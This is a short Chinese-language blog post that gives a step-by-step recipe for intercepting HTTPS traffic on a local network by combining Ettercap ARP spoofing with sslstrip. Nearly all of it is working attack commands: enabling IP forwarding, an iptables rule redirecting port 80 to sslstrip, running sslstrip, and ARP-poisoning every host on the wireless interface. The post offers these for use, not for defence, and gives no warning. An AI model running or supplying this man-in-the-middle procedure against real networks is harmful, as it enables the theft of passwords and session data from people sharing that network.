Ettercap結合sslstrip對ssl/https進行攻擊

       Ettercap是一個非常強大的嗅探欺騙工具;在以往的ettercap的使用過程中,我們大多用來嗅探http,ftp,和一些加密比較簡單的郵箱等的密碼,對於新型的ssl/https等的加密協議就顯得不是太完美;這裏我們使用一款專門針對ssl/https加密協議的工具配合Ettercap進行局域網嗅探欺騙:sslstrip。
       以下方法均來自互聯網,這裏只是記錄一下筆者自己使用過程!

1.開啓轉發:
echo "1">/proc/sys/net/ipv4/ip_forward
2.iptables過濾數據包
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
3.監聽轉發端口
sslstrip -l 10000 
4.arp嗅探
ettercap -T -q -i wlan0 -M arp:remote // //






發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章